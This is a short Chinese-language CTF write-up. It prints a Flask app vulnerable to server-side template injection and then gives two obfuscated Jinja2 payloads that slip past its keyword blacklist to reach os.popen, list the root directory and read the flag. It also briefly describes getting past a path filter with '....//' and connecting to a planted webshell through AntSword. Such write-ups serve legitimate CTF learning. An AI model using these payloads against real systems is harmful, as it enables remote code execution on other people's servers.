Safe_Proxy

开局源码,貌似不能直接搞

拉到本地直接梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)

@app.route('/', methods=["GET"])
def source():
with open(__file__, 'r', encoding='utf-8') as f:
return '<pre>'+html.escape(f.read())+'</pre>'

@app.route('/', methods=["POST"])
def template():
template_code = request.form.get("code")
# 安全过滤
blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
for black in blacklist:
if black in template_code:
return "Forbidden content detected!"
result = render_template_string(template_code)
print(result)
return result
if __name__ == "__main__":
app.run(host='127.0.0.1',port=5000)

拿payload直接打

1
code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set rr='so'[::-1]%}{{cycler.next[gl][bu][im](rr)['p''open']('echo `ls /` > app.py').read()}}

1
code={%set gl='_'*2+'globals'+'_'*2%}{%set bu='_'*2+'builtins'+'_'*2%}{%set im='_'*2+'i''mport'+'_'*2%}{%set rr='so'[::-1]%}{{cycler.next[gl][bu][im](rr)['p''open']('echo `cat /flag` > app.py').read()}}

hello web

看注释看到了一个这个提示

访问后发现,得….//绕过

这么个事儿

image-20241215191139648

它是个🐎啊

image-20241215202829273

蚁剑连接在/run/log/这个里面的其中一个文件夹中有flag

sxweb1明明按道理应该出的,™的一直报500…….5555555…还是菜。。。